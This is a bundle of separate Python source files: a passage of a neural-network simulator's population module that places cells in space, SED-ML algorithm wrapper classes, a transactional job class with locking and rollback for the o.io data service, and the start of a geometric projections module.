gid = sim.net.lastGid+i
self.cellGids.append(gid) # add gid list of cells belonging to this population - not needed?
cellTags = {k: v for (k, v) in self.tags.items() if k in sim.net.params.popTagsCopiedToCells} # copy all pop tags to cell tags, except those that are pop-specific
cellTags['pop'] = self.tags['pop']
cellTags['xnorm'] = randLocs[i,0] # set x location (um)
cellTags['ynorm'] = randLocs[i,1] # set y location (um)
cellTags['znorm'] = randLocs[i,2] # set z location (um)
cellTags['x'] = sim.net.params.sizeX * randLocs[i,0] # set x location (um)
cellTags['y'] = sim.net.params.sizeY * randLocs[i,1] # set y location (um)
cellTags['z'] = sim.net.params.sizeZ * randLocs[i,2] # set z location (um)
if 'spkTimes' in self.tags: # if VecStim, copy spike times to params
if isinstance(self.tags['spkTimes'][0], list):
try:
cellTags['params']['spkTimes'] = self.tags['spkTimes'][i] # 2D list
except:
pass
else:
cellTags['params']['spkTimes'] = self.tags['spkTimes'] # 1D list (same for all)
cells.append(self.cellModelClass(gid, cellTags)) # instantiate Cell object
if sim.cfg.verbose: print(('Cell %d/%d (gid=%d) of pop %s, on node %d, '%(i, sim.net.params.scale * self.tags['numCells']-1, gid, self.tags['pop'], sim.rank)))
sim.net.lastGid = sim.net.lastGid + self.tags['numCells']
return cells
def createCellsDensity (self):
''' Create population cells based on density'''
from .. import sim
cells = []
shape = sim.net.params.shape
sizeX = sim.net.params.sizeX
sizeY = sim.net.params.sizeY
sizeZ = sim.net.params.sizeZ
# calculate volume
if shape == 'cuboid':
volume = sizeY/1e3 * sizeX/1e3 * sizeZ/1e3
elif shape == 'cylinder':
volume = sizeY/1e3 * sizeX/1e3/2 * sizeZ/1e3/2 * pi
elif shape == 'ellipsoid':
volume = sizeY/1e3/2.0 * sizeX/1e3/2.0 * sizeZ/1e3/2.0 * pi * 4.0 / 3.0
for coord in ['x', 'y', 'z']:
if coord+'Range' in self.tags: # if user provided absolute range, convert to normalized
self.tags[coord+'normRange'] = [point / getattr(sim.net.params, 'size'+coord.upper()) for point in self.tags[coord+'Range']]
if coord+'normRange' in self.tags: # if normalized range, rescale volume
minv = self.tags[coord+'normRange'][0]
maxv = self.tags[coord+'normRange'][1]
volume = volume * (maxv-minv)
funcLocs = None # start with no locations as a function of density function
if isinstance(self.tags['density'], basestring): # check if density is given as a function
if shape == 'cuboid': # only available for cuboids
strFunc = self.tags['density'] # string containing function
strVars = [var for var in ['xnorm', 'ynorm', 'znorm'] if var in strFunc] # get list of variables used
if not len(strVars) == 1:
print('Error: density function (%s) for population %s does not include "xnorm", "ynorm" or "znorm"'%(strFunc,self.tags['pop']))
return
coordFunc = strVars[0]
lambdaStr = 'lambda ' + coordFunc +': ' + strFunc # convert to lambda function
densityFunc = eval(lambdaStr)
minRange = self.tags[coordFunc+'Range'][0]
maxRange = self.tags[coordFunc+'Range'][1]
interval = 0.001 # interval of location values to evaluate func in order to find the max cell density
maxDensity = max(list(map(densityFunc, (np.arange(minRange, maxRange, interval))))) # max cell density
maxCells = volume * maxDensity # max number of cells based on max value of density func
self.rand.Random123(int(maxDensity), sim.net.lastGid, sim.cfg.seeds['loc'])
locsAll = minRange + ((maxRange-minRange)) * np.array([self.rand.uniform(0, 1) for i in range(int(maxCells))]) # random location values
locsProb = np.array(list(map(densityFunc, locsAll))) / maxDensity # calculate normalized density for each location value (used to prune)
allrands = np.array([self.rand.uniform(0, 1) for i in range(len(locsProb))]) # create an array of random numbers for checking each location pos
makethiscell = locsProb>allrands # perform test to see whether or not this cell should be included (pruning based on density func)
funcLocs = [locsAll[i] for i in range(len(locsAll)) if i in np.array(makethiscell.nonzero()[0],dtype='int')] # keep only subset of yfuncLocs based on density func
self.tags['numCells'] = len(funcLocs) # final number of cells after pruning of location values based on density func
if sim.cfg.verbose: print('Volume=%.2f, maxDensity=%.2f, maxCells=%.0f, numCells=%.0f'%(volume, maxDensity, maxCells, self.tags['numCells']))
else:
print('Error: Density functions are only implemented for cuboid shaped networks')
exit(0)
else: # NO ynorm-dep
self.tags['numCells'] = int(self.tags['density'] * volume) # = density (cells/mm^3) * volume (mm^3)
# calculate locations of cells
self.rand.Random123(self.tags['numCells'], sim.net.lastGid, sim.cfg.seeds['loc'])
self.rand.uniform(0, 1)
vec = h.Vector(self.tags['numCells']*3)
vec.setrand(self.rand)
randLocs = np.array(vec).reshape(self.tags['numCells'], 3) # create random x,y,z locations
if sim.net.params.shape == 'cylinder':
# Use the x,z random vales
rho = randLocs[:,0] # use x rand value as the radius rho in the interval [0, 1)
phi = 2 * pi * randLocs[:,2] # use z rand value as the angle phi in the interval [0, 2*pi)
x = (1 + sqrt(rho) * cos(phi))/2.0
z = (1 + sqrt(rho) * sin(phi))/2.0
randLocs[:,0] = x
randLocs[:,2] = z
elif sim.net.params.shape == 'ellipsoid':
# Use the x,y,z random vales
rho = np.power(randLocs[:,0], 1.0/3.0) # use x rand value as the radius rho in the interval [0, 1); cuberoot
phi = 2 * pi * randLocs[:,1] # use y rand value as the angle phi in the interval [0, 2*pi)
costheta = (2 * randLocs[:,2]) - 1 # use z rand value as cos(theta) in the interval [-1, 1); ensures uniform dist
theta = arccos(costheta) # obtain theta from cos(theta)
x = (1 + rho * cos(phi) * sin(theta))/2.0
y = (1 + rho * sin(phi) * sin(theta))/2.0
z = (1 + rho * cos(theta))/2.0
randLocs[:,0] = x
randLocs[:,1] = y
randLocs[:,2] = z
for icoord, coord in enumerate(['x', 'y', 'z']):
if coord+'normRange' in self.tags: # if normalized range, rescale random locations
minv = self.tags[coord+'normRange'][0]
maxv = self.tags[coord+'normRange'][1]
randLocs[:,icoord] = randLocs[:,icoord] * (maxv-minv) + minv
if funcLocs and coordFunc == coord+'norm': # if locations for this coordinate calculated using density function
randLocs[:,icoord] = funcLocs
if sim.cfg.verbose and not funcLocs: print('Volume=%.4f, density=%.2f, numCells=%.0f'%(volume, self.tags['density'], self.tags['numCells']))
for i in self._distributeCells(self.tags['numCells'])[sim.rank]:
gid = sim.net.lastGid+i
self.cellGids.append(gid) # add gid list of cells belonging to this population - not needed?
cellTags = {k: v for (k, v) in self.tags.items() if k in sim.net.params.popTagsCopiedToCells} # copy all pop tags to cell tags, except those that are pop-specific
cellTags['pop'] = self.tags['pop']
cellTags['xnorm'] = randLocs[i,0] # calculate x location (um)
cellTags['ynorm'] = randLocs[i,1] # calculate y location (um)
cellTags['znorm'] = randLocs[i,2] # calculate z location (um)
cellTags['x'] = sizeX * randLocs[i,0] # calculate x location (um)
cellTags['y'] = sizeY * randLocs[i,1] # calculate y location (um)
cellTags['z'] = sizeZ * randLocs[i,2] # calculate z location (um)
cells.append(self.cellModelClass(gid, cellTags)) # instantiate Cell object
if sim.cfg.verbose:
print(('Cell %d/%d (gid=%d) of pop %s, pos=(%2.f, %2.f, %2.f), on node %d, '%(i, self.tags['numCells']-1, gid, self.tags['pop'],cellTags['x'], cellTags['y'], cellTags['z'], sim.rank)))
sim.net.lastGid = sim.net.lastGid + self.tags['numCells']
return cells
def createCellsList (self):
''' Create population cells based on list of individual cells'''
from .. import sim
cells = []
self.tags['numCells'] = len(self.tags['cellsList'])
for i in self._distributeCells(len(self.tags['cellsList']))[sim.rank]:
#if 'cellModel' in self.tags['cellsList'][i]:
# self.cellModelClass = getattr(f, self.tags['cellsList'][i]['cellModel']) # select cell class to instantiate cells based on the cellModel tags
gid = sim.net.lastGid+i
self.cellGids.append(gid) # add gid list of cells belonging to this population - not needed?
cellTags = {k: v for (k, v) in self.tags.items() if k in sim.net.params.popTagsCopiedToCells} # copy all pop tags to cell tags, except those that are pop-specific
cellTags['pop'] = self.tags['pop']
cellTags.update(self.tags['cellsList'][i]) # add tags specific to this cells
for coord in ['x','y','z']:
if coord in cellTags: # if absolute coord exists
cellTags[coord+'norm'] = cellTags[coord]/getattr(sim.net.params, 'size'+coord.upper()) # calculate norm coord
elif coord+'norm' in cellTags: # elif norm coord exists
cellTags[coord] = cellTags[coord+'norm']*getattr(sim.net.params, 'size'+coord.upper()) # calculate norm coord
else:
cellTags[coord+'norm'] = cellTags[coord] = 0
if 'cellModel' in self.tags.keys() and self.tags['cellModel'] == 'Vecstim': # if VecStim, copy spike times to params
cellTags['params']['spkTimes'] = self.tags['cellsList'][i]['spkTimes']
cells.append(self.cellModelClass(gid, cellTags)) # instantiate Cell object
if sim.cfg.verbose: print(('Cell %d/%d (gid=%d) of pop %d, on node %d, '%(i, self.tags['numCells']-1, gid, i, sim.rank)))
sim.net.lastGid = sim.net.lastGid + len(self.tags['cellsList'])
return cells
def createCellsGrid (self):
''' Create population cells based on fixed number of cells'''
from .. import sim
cells = []
rangeLocs = [[0, getattr(sim.net.params, 'size'+coord)] for coord in ['X','Y','Z']]
for icoord, coord in enumerate(['x', 'y', 'z']):
# constrain to range set by user
if coord+'normRange' in self.tags: # if normalized range, convert to normalized
self.tags[coord+'Range'] = [float(point) * getattr(sim.net.params, 'size'+coord.upper()) for point in self.tags[coord+'Range']]
if coord+'Range' in self.tags: # if user provided absolute range, calculate range
self.tags[coord+'normRange'] = [float(point) / getattr(sim.net.params, 'size'+coord.upper()) for point in self.tags[coord+'Range']]
rangeLocs[icoord] = [self.tags[coord+'Range'][0], self.tags[coord+'Range'][1]]
gridSpacing = self.tags['gridSpacing']
gridLocs = []
for x in np.arange(rangeLocs[0][0], rangeLocs[0][1]+1, gridSpacing):
for y in np.arange(rangeLocs[1][0], rangeLocs[1][1]+1, gridSpacing):
for z in np.arange(rangeLocs[2][0], rangeLocs[2][1]+1, gridSpacing):
gridLocs.append((x, y, z))
numCells = len(gridLocs)
for i in self._distributeCells(numCells)[sim.rank]:
gid = sim.net.lastGid+i
self.cellGids.append(gid) # add gid list of cells belonging to this population - not needed?
cellTags = {k: v for (k, v) in self.tags.items() if k in sim.net.params.popTagsCopiedToCells} # copy all pop tags to cell tags, except those that are pop-specific
cellTags['pop'] = self.tags['pop']
cellTags['xnorm'] = gridLocs[i][0] / sim.net.params.sizeX # set x location (um)
cellTags['ynorm'] = gridLocs[i][1] / sim.net.params.sizeY # set y location (um)
cellTags['znorm'] = gridLocs[i][2] / sim.net.params.sizeZ # set z location (um)
cellTags['x'] = gridLocs[i][0] # set x location (um)
cellTags['y'] = gridLocs[i][1] # set y location (um)
cellTags['z'] = gridLocs[i][2] # set z location (um)
cells.append(self.cellModelClass(gid, cellTags)) # instantiate Cell object
if sim.cfg.verbose: print(('Cell %d/%d (gid=%d) of pop %s, on node %d, '%(i, numCells, gid, self.tags['pop'], sim.rank)))
sim.net.lastGid = sim.net.lastGid + numCells
return cells
def _setCellClass (self):
''' Set cell class (CompartCell, PointCell, etc)'''
from .. import sim
# Check whether it's a NeuroML2 based cell
if 'originalFormat' in self.tags:
if self.tags['originalFormat'] == 'NeuroML2':
self.cellModelClass = sim.NML2Cell
if self.tags['originalFormat'] == 'NeuroML2_SpikeSource':
self.cellModelClass = sim.NML2SpikeSource
else:
# set cell class: CompartCell for compartmental cells of PointCell for point neurons (NetStims, IntFire1,...)
try: # check if cellModel corresponds to an existing point process mechanism; if so, use PointCell
tmp = getattr(h, self.tags['cellModel'])
self.cellModelClass = sim.PointCell
excludeTags = ['pop', 'cellModel', 'cellType', 'numCells', 'density', 'cellsList',
'xRange', 'yRange', 'zRange', 'xnormRange', 'ynormRange', 'znormRange', 'vref', 'spkTimes']
params = {k: v for k,v in self.tags.items() if k not in excludeTags}
self.tags['params'] = params
for k in self.tags['params']: self.tags.pop(k)
sim.net.params.popTagsCopiedToCells.append('params')
except:
if getattr(self.tags, 'cellModel', None) in ['NetStim', 'VecStim', 'IntFire1', 'IntFire2', 'IntFire4']:
print('Warning: could not find %s point process mechanism required for population %s' % (self.tags['cellModel'], self.tags['pop']))
self.cellModelClass = sim.CompartCell # otherwise assume has sections and some cellParam rules apply to it; use CompartCell
def calcRelativeSegCoords(self):
"""Calculate segment coordinates from 3d point coordinates
Used for LFP calc (one per population cell; assumes same morphology)"""
from .. import sim
localPopGids = list(set(sim.net.gid2lid.keys()).intersection(set(self.cellGids)))
if localPopGids:
cell = sim.net.cells[sim.net.gid2lid[localPopGids[0]]]
else:
return -1
ix = 0 # segment index
p3dsoma = cell.getSomaPos()
nseg = sum([sec['hObj'].nseg for sec in list(cell.secs.values())])
p0 = np.zeros((3, nseg)) # hold the coordinates of segment starting points
p1 = np.zeros((3, nseg)) # hold the coordinates of segment end points
d0 = np.zeros(nseg)
d1 = np.zeros(nseg)
for sec in list(cell.secs.values()):
hSec = sec['hObj']
hSec.push()
n3d = int(h.n3d()) # get number of n3d points in each section
p3d = np.zeros((3, n3d)) # to hold locations of 3D morphology for the current section
l3d = np.zeros(n3d) # to hold locations of 3D morphology for the current section
diam3d = np.zeros(n3d) # to diameters
for i in range(n3d):
p3d[0, i] = h.x3d(i) - p3dsoma[0]
p3d[1, i] = h.y3d(i) - p3dsoma[1] # shift coordinates such to place soma at the origin.
p3d[2, i] = h.z3d(i) - p3dsoma[2]
diam3d[i] = h.diam3d(i)
l3d[i] = h.arc3d(i)
l3d /= hSec.L # normalize
nseg = hSec.nseg
l0 = np.zeros(nseg) # keep range of segment starting point
l1 = np.zeros(nseg) # keep range of segment ending point
for iseg, seg in enumerate(hSec):
l0[iseg] = seg.x - 0.5*1/nseg # x (normalized distance along the section) for the beginning of the segment
l1[iseg] = seg.x + 0.5*1/nseg # x for the end of the segment
p0[0, ix:ix+nseg] = np.interp(l0, l3d, p3d[0, :])
p0[1, ix:ix+nseg] = np.interp(l0, l3d, p3d[1, :])
p0[2, ix:ix+nseg] = np.interp(l0, l3d, p3d[2, :])
d0[ix:ix+nseg] = np.interp(l0, l3d, diam3d[:])
p1[0, ix:ix+nseg] = np.interp(l1, l3d, p3d[0, :])
p1[1, ix:ix+nseg] = np.interp(l1, l3d, p3d[1, :])
p1[2, ix:ix+nseg] = np.interp(l1, l3d, p3d[2, :])
d1[ix:ix+nseg] = np.interp(l1, l3d, diam3d[:])
ix += nseg
h.pop_section()
self._morphSegCoords = {}
self._morphSegCoords['p0'] = p0
self._morphSegCoords['p1'] = p1
self._morphSegCoords['d0'] = d0
self._morphSegCoords['d1'] = d1
return self._morphSegCoords
def __getstate__ (self):
from .. import sim
''' Removes non-picklable h objects so can be pickled and sent via py_alltoall'''
odict = self.__dict__.copy() # copy the dict since we change it
odict = sim.replaceFuncObj(odict) # replace h objects with None so can be pickled
#odict['cellModelClass'] = str(odict['cellModelClass'])
del odict['cellModelClass']
del odict['rand']
return odict
|
|
#!/usr/bin/env python
# coding=utf-8
## @package biopredyn
## Copyright: [2012-2019] Cosmo Tech, All Rights Reserved
## License: BSD 3-Clause
import sys
import libsedml
## Representation of an algorithm in SED-ML workflows; an algorithm is defined
## using a KiSAO id along with several optional algorithm parameters.
class Algorithm:
## @var id
# A unique identifier for this object.
## @var kisao_id
# A KiSAO identifier (syntax KISAO:0000XYZ) for the algorithm encoded by this.
## @var name
# Name of this object.
## @var parameters
# A list of AlgorithmParameter objects.
## Constructor; either 'algo' or 'idf' and 'kid' must be passed as keyword
## argument(s).
# @param self The object pointer.
# @param algo A libsedml.SedAlgorithm element; optional (default: None).
# @param idf A unique identifier; optional (default: None).
# @param name A name for 'self'; optional (default: None).
# @param kid A valid KiSAO identifier; optional (default: None).
def __init__(self, algo=None, idf=None, name=None, kid=None):
if algo is None and (idf is None or kid is None):
raise RuntimeError("Either 'algo' or 'idf' and 'kid' must be " +
"passed as keyword argument(s).")
else:
self.parameters = []
if algo is not None:
self.id = algo.getId()
self.name = algo.getName()
self.kisao_id = algo.getKisaoID()
for p in algo.getListOfAlgorithmParameters():
self.add_parameter(AlgorithmParameter(parameter=p))
else:
self.id = idf
self.name = name
self.kisao_id = kid
## Appends the input biopredyn.parameter.AlgorithmParameter object to
## self.parameters.
# @param self The object pointer.
# @param par A biopredyn.parameter.AlgorithmParameter object.
def add_parameter(self, par):
self.parameters.append(par)
## Getter. Returns self.id.
# @param self The object pointer.
# @return self.id
def get_id(self):
return self.id
## Getter. Returns self.kisao_id.
# @param self The object pointer.
# @return self.kisao_id
def get_kisao_id(self):
return self.kisao_id
## Getter. Returns self.name.
# @param self The object pointer.
# @return self.name
def get_name(self):
return self.name
## Getter. Returns the first AlgorithmParameter object with the input id in
## self.parameters.
# @param self The object pointer.
# @param id ID of the object to be returned in self.parameters.
# @return An AlgorithmParameter object.
def get_parameter_by_id(self, id):
res = None
for p in self.parameters:
if (p.get_id() == id):
res = p
return res
## Getter. Returns the first AlgorithmParameter object with the input name in
## self.parameters.
# @param self The object pointer.
# @param name Name of the object to be returned in self.parameters.
# @return An AlgorithmParameter object.
def get_parameter_by_name(self, name):
res = None
for p in self.parameters:
if (p.get_name() == name):
res = p
return res
## Getter. Returns self.parameters.
# @param self The object pointer.
# @return self.parameters
def get_parameters(self):
return self.parameters
## Setter for self.id.
# @param self The object pointer.
# @param id New value for self.id
def set_id(self, id):
self.id = id
## Setter for self.kisao_id.
# @param self The object pointer.
# @param kisao_id New value for self.kisao_id
def set_kisao_id(self, kisao_id):
self.kisao_id = kisao_id
## Setter for self.name.
# @param self The object pointer.
# @param name New value for self.name
def set_name(self, name):
self.name = name
## Returns the libsedml.SedAlgorithm representation of this.
# @param self The object pointer.
# @param level Level of SED-ML language to be used.
# @param version Version of SED-ML language to be used.
# @return A libsedml.SedAlgorithm object.
def to_sedml(self, level, version):
alg = libsedml.SedAlgorithm(level, version)
if self.get_name() is not None:
alg.setName(str(self.get_name()))
alg.setKisaoID(self.get_kisao_id())
for p in self.get_parameters():
alg.addAlgorithmParameter(p.to_sedml(level, version))
return alg
## Representation of an algorithm parameter in SED-ML workflows; an algorithm
## parameter is defined using a KiSAO id, and has a value.
class AlgorithmParameter:
## @var id
# A unique identifier for this object.
## @var kisao_id
# A KiSAO identifier (syntax KISAO:0000XYZ) for the parameter encoded by this.
## @var name
# Name of this object.
## @var value
# A string value for this parameter.
## Constructor; either 'parameter' or 'idf', 'kid' and 'value' must be passed
## as keyword argument(s).
# @param self the object pointer.
# @param parameter A libsedml.SedAlgorithmParameter object; optional (default:
# None).
# @param idf A unique identifier; optional (default: None).
# @param name A name for 'self'; optional (default: None).
# @param kid A valid KiSAO identifier; optional (default: None).
# @param value A string value for this parameter; optional (default: None).
def __init__(self, parameter=None, idf=None, name=None, kid=None, value=None):
if parameter is None and (idf is None or kid is None or value is None):
raise RuntimeError("Either 'parameter' or 'idf', 'kid' and " +
"'value' must be passed as keyword argument(s).")
else:
if parameter is not None:
self.id = parameter.getId()
self.name = parameter.getName()
self.kisao_id = parameter.getKisaoID()
self.value = parameter.getValue()
else:
self.id = idf
self.name = name
self.kisao_id = kid
self.value = value
## Getter. Returns self.id.
# @param self The object pointer.
# @return self.id
def get_id(self):
return self.id
## Getter. Returns self.kisao_id.
# @param self The object pointer.
# @return self.kisao_id
def get_kisao_id(self):
return self.kisao_id
## Getter. Returns self.name.
# @param self The object pointer.
# @return self.name
def get_name(self):
return self.name
## Getter. Returns self.value.
# @param self The object pointer.
# @return self.value
def get_value(self):
return self.value
## Setter for self.id.
# @param self The object pointer.
# @param id New value for self.id
def set_id(self, id):
self.id = id
## Setter for self.kisao_id.
# @param self The object pointer.
# @param kisao_id New value for self.kisao_id
def set_kisao_id(self, kisao_id):
self.kisao_id = kisao_id
## Setter for self.name.
# @param self The object pointer.
# @param name New value for self.name
def set_name(self, name):
self.name = name
## Setter for self.value.
# @param self The object pointer.
# @param value New value for self.value
def set_value(self, value):
self.value = value
## Returns the libsedml.SedAlgorithmParameter representation of this.
# @param self The object pointer.
# @param level Level of SED-ML language to be used.
# @param version Version of SED-ML language to be used.
# @return A libsedml.SedAlgorithmParameter object.
def to_sedml(self, level, version):
par = libsedml.SedAlgorithmParameter(level, version)
par.setId(self.get_id())
if self.get_name() is not None:
par.setName(str(self.get_name()))
par.setKisaoID(self.get_kisao_id())
par.setValue(str(self.get_value()))
return par
|
|
"""
oiot.job
~~~~~~~~~
This module implements the Job class.
:copyright: (c) 2014 by Konstantin Bokarius.
:license: MIT, see LICENSE for more details.
"""
import os, sys, traceback, binascii, json, random, string, \
datetime, uuid
from datetime import datetime
from .settings import _locks_collection, _jobs_collection, \
_max_job_time_in_ms, _deleted_object_value
from .exceptions import JobIsRolledBack, JobIsFailed, FailedToComplete, \
FailedToRollBack, RollbackCausedByException, JobIsTimedOut, \
CollectionKeyIsLocked, JobIsCompleted, _get_httperror_status_code
class Job:
"""
A class used for executing o.io operations as a single atomic
transaction by utilizing locking and journaling mechanisms.
"""
def __init__(self, client):
"""
Create a Job instance.
:param client: the client to use
"""
self._job_id = Job._generate_key()
self._timestamp = datetime.utcnow()
self._client = client
self._locks = []
self._journal = []
self.is_completed = False
self.is_rolled_back = False
# A job should fail only in the event of an exception during
# completion or roll-back.
self.is_failed = False
@staticmethod
def _generate_key():
"""
Generate a random 16 character alphanumeric string.
:return: a random 16 character alphanumeric string.
"""
return str(binascii.b2a_hex(os.urandom(8)))
@staticmethod
def _get_lock_collection_key(collection_to_lock, key_to_lock):
"""
Get the key used for the locks collection based on the specified
collection name key.
:param collection_to_lock: the collection name to lock
:param key_to_lock: the key to lock
:return: the formatted locks collection key
"""
return collection_to_lock + "-" + str(key_to_lock)
@staticmethod
def _create_and_add_lock(client, collection, key, job_id, timestamp):
"""
Create and add a lock to the locks collection. This will instantiate a
lock object, add its details to the locks collection in o.io, and return
the lock instance.
:param client: the client to use
:param collection: the collection name
:param key: the key
:param job_id: the job ID
:param timestamp: the timestamp
:return: the created lock
"""
lock = _Lock(job_id, timestamp, datetime.utcnow(),
collection, key, None)
lock_response = client.put(_locks_collection,
Job._get_lock_collection_key(collection, key),
json.loads(json.dumps(vars(lock), cls=_Encoder)),
False, False)
if lock_response.status_code == 412:
raise CollectionKeyIsLocked
lock_response.raise_for_status()
lock.lock_ref = lock_response.ref
return lock
@staticmethod
def _roll_back_journal_item(client, journal_item, raise_if_timed_out):
"""
Roll back the specified journal item.
:param client: the client to use
:param journal_item: the journal item to roll back
:param raise_if_timed_out: the method to call if the roll back times out
"""
# Don't attempt to roll-back if the original value and the
# new value are the same.
if journal_item.original_value == journal_item.new_value:
return
raise_if_timed_out()
was_objected_deleted = journal_item.new_value == _deleted_object_value
get_response = client.get(journal_item.collection,
journal_item.key, None, False)
try:
get_response.raise_for_status()
except Exception as e:
if _get_httperror_status_code(e) == 404:
if was_objected_deleted is False:
return
else:
raise e
# Don't attempt to roll-back if the new value does not match
# unless the record was deleted by the job.
if (was_objected_deleted is False and
get_response.json != journal_item.new_value):
return
# Was there an original value?
if journal_item.original_value:
# Put back the original value only if the new
# value matches or if the record was deleted by
# the job.
if ((was_objected_deleted and
get_response.status_code == 404) or
(was_objected_deleted is False and
get_response.json == journal_item.new_value)):
original_ref = False
if was_objected_deleted is False:
original_ref = get_response.ref
raise_if_timed_out()
try:
put_response = client.put(
journal_item.collection,
journal_item.key,
journal_item.original_value,
original_ref, False)
put_response.raise_for_status()
except Exception as e:
# Ignore 412 error if the ref did not match.
if (_get_httperror_status_code(e) == 412):
return
else:
raise e
# No original value indicates that a new record was
# added and should be deleted.
else:
raise_if_timed_out()
try:
delete_response = client.delete(
journal_item.collection,
journal_item.key,
get_response.ref, False)
delete_response.raise_for_status()
except Exception as e:
# Ignore 412 error if the ref did not match.
if (_get_httperror_status_code(e) == 412):
return
else:
raise e
def _verify_job_is_active(self):
"""
Verify that this job is active and raise an exception if it is not.
"""
if self.is_failed:
raise JobIsFailed
elif self.is_completed:
raise JobIsCompleted
elif self.is_rolled_back:
raise JobIsRolledBack
self._raise_if_job_is_timed_out()
def _raise_if_job_is_timed_out(self):
"""
Verify that this job is not timed out and raise an exception
if it is.
"""
elapsed_milliseconds = (datetime.utcnow() -
self._timestamp).total_seconds() * 1000.0
if elapsed_milliseconds > _max_job_time_in_ms:
raise JobIsTimedOut('Ran for ' + str(elapsed_milliseconds) + 'ms')
def _remove_locks(self):
"""
Remove all locks associated with this job from o.io.
"""
for lock in self._locks:
self._raise_if_job_is_timed_out()
response = self._client.delete(_locks_collection,
Job._get_lock_collection_key(lock.collection, lock.key),
lock.lock_ref, False)
response.raise_for_status()
self._locks = []
def _remove_job(self):
"""
Remove this job from o.io.
"""
self._raise_if_job_is_timed_out()
response = self._client.delete(_jobs_collection, self._job_id,
None, False)
response.raise_for_status()
self._journal = []
def _get_lock(self, collection, key):
"""
Create a lock for the specified collection and key and add
it to o.io.
:param collection: the specified collection to lock
:param key: the specified key to lock
:return: the created lock
"""
for lock in self._locks:
if lock.collection == collection and lock.key == key:
return lock
self._raise_if_job_is_timed_out()
lock = Job._create_and_add_lock(self._client, collection, key,
self._job_id, self._timestamp)
self._locks.append(lock)
return lock
def _add_journal_item(self, collection, key, new_value, original_value):
"""
Add a journal item to this job.
:param collection: the collection
:param key: the key
:param new_value: the new value
:param original_value: the original value
:return: the created journal item
"""
self._raise_if_job_is_timed_out()
journal_item = _JournalItem(datetime.utcnow(), collection, key,
original_value, new_value)
self._journal.append(journal_item)
job_response = self._client.put(_jobs_collection, self._job_id,
json.loads(json.dumps({'timestamp': self._timestamp,
'items': self._journal}, cls=_Encoder)), None, False)
job_response.raise_for_status()
return journal_item
def get(self, collection, key, ref = None):
"""
Execute a get operation via this job by locking the collection key
prior to executing the operation.
:param collection: the collection
:param key: the key
:param ref: the ref
:return: the operation's response
"""
self._verify_job_is_active()
try:
lock = self._get_lock(collection, key)
self._raise_if_job_is_timed_out()
response = self._client.get(collection, key, ref, False)
response.raise_for_status()
self._raise_if_job_is_timed_out()
return response
except Exception as e:
self.roll_back((e, traceback.format_exc()))
def post(self, collection, value):
"""
Execute a post operation via this job by locking the collection key
prior to executing the operation.
:param collection: the collection
:param key: the key
:param ref: the ref
:return: the operation's response
"""
key = Job._generate_key()
return self.put(collection, key, value)
def put(self, collection, key, value, ref = None):
"""
Execute a put operation via this job by locking the collection key
prior to executing the operation.
:param collection: the collection
:param key: the key
:return: the operation's response
"""
self._verify_job_is_active()
try:
lock = self._get_lock(collection, key)
self._raise_if_job_is_timed_out()
# If ref was passed, ensure that the value has not changed.
# If ref was not passed, retrieve the current ref and store it.
response = self._client.get(collection, key, ref, False)
# Indicates a new record will be created.
if response.status_code == 404:
original_value = None
# Indicates an existing record will be updated so store the
# original ref and value.
elif response.status_code == 200:
original_value = response.json
else:
response.raise_for_status()
journal_item = self._add_journal_item(collection, key,
value, original_value)
self._raise_if_job_is_timed_out()
response = self._client.put(collection, key, value, ref, False)
response.raise_for_status()
self._raise_if_job_is_timed_out()
return response
except Exception as e:
self.roll_back((e, traceback.format_exc()))
def delete(self, collection, key, ref = None):
"""
Execute a delete operation via this job by locking the collection key
prior to executing the operation.
:param collection: the collection
:param key: the key
:return: the operation's response
"""
self._verify_job_is_active()
try:
lock = self._get_lock(collection, key)
self._raise_if_job_is_timed_out()
# The record must be present in order to delete it.
response = self._client.get(collection, key, ref, False)
response.raise_for_status()
original_value = response.json
journal_item = self._add_journal_item(collection, key,
_deleted_object_value, original_value)
self._raise_if_job_is_timed_out()
response = self._client.delete(collection, key, ref, False)
response.raise_for_status()
self._raise_if_job_is_timed_out()
return response
except Exception as e:
self.roll_back((e, traceback.format_exc()))
def roll_back(self, exception_causing_rollback = None):
"""
Rolls back this job by rolling back each journal item and removing
the locks associated with the job and the job itself.
:param exception_causing_rollback: the exception that caused
the roll back
"""
self._verify_job_is_active()
try:
for journal_item in self._journal:
Job._roll_back_journal_item(self._client, journal_item,
self._raise_if_job_is_timed_out)
self._remove_job()
self._remove_locks()
self.is_rolled_back = True
if exception_causing_rollback:
raise RollbackCausedByException(exception_causing_rollback[0],
exception_causing_rollback[1])
except RollbackCausedByException as e:
raise e
except Exception as e:
self.is_failed = True
if exception_causing_rollback:
raise FailedToRollBack(e, traceback.format_exc(),
exception_causing_rollback[0],
exception_causing_rollback[1])
else:
raise FailedToRollBack(e, traceback.format_exc())
def complete(self):
"""
Completes this job by removing the locks associated with the job
and the job itself.
"""
self._verify_job_is_active()
try:
self._remove_job()
self._remove_locks()
self.is_completed = True
except Exception as e:
self.is_failed = True
raise FailedToComplete(e, traceback.format_exc())
class _Lock(object):
"""
Represents a read-write lock and its information.
"""
def __init__(self, job_id = None, job_timestamp = None, timestamp = None,
collection = None, key = None, lock_ref = None):
"""
Create a Lock instance.
:param job_id: the job ID
:param job_timestamp: the job timestamp
:param timestamp: the lock timestamp
:param collection: the collection
:param key: the key
:param lock_ref: the o.io ref value for the lock object
"""
self.job_id = job_id
self.job_timestamp = job_timestamp
self.timestamp = timestamp
self.collection = collection
self.key = key
self.lock_ref = lock_ref
class _JournalItem(object):
"""
Represents a journal item and its information.
"""
def __init__(self, timestamp = None, collection = None, key = None,
original_value = None, new_value = None):
"""
Create a JournalItem instance.
:param timestamp: the timestamp
:param collection: the collection
:param key: the key
:param original_value: the original value
:param new_value: the new value
"""
self.timestamp = timestamp
self.collection = collection
self.key = key
self.original_value = original_value
self.new_value = new_value
class _Encoder(json.JSONEncoder):
"""
Determines how to properly encode objects into JSON.
"""
def default(self, obj):
if isinstance(obj, datetime):
return obj.isoformat()
elif isinstance(obj, _JournalItem):
return vars(obj)
elif isinstance(obj, uuid.UUID):
return str(obj)
return json.JSONEncoder.default(self, obj)
|
|
# -*- coding: utf-8 -*-
"""
Transformations from the breakdowns to some surface in 3-space
(sometimes 2-space)
Attributes:
PROJECTIONS: A map of maps. The first map is keyed on the name of a family
of projections, and the second is keyed on shape (3 or 4). For
instance, PROJECTIONS['nslerp'][3] gives the function to perform
nslerp on a triangle.
PARALLEL: A list of which projections are compatible with
parallel projection.
"""
import numpy as np
from numpy.linalg import norm
from . import xmath, breakdown
_TEST_EQ_TRI = np.eye(3)
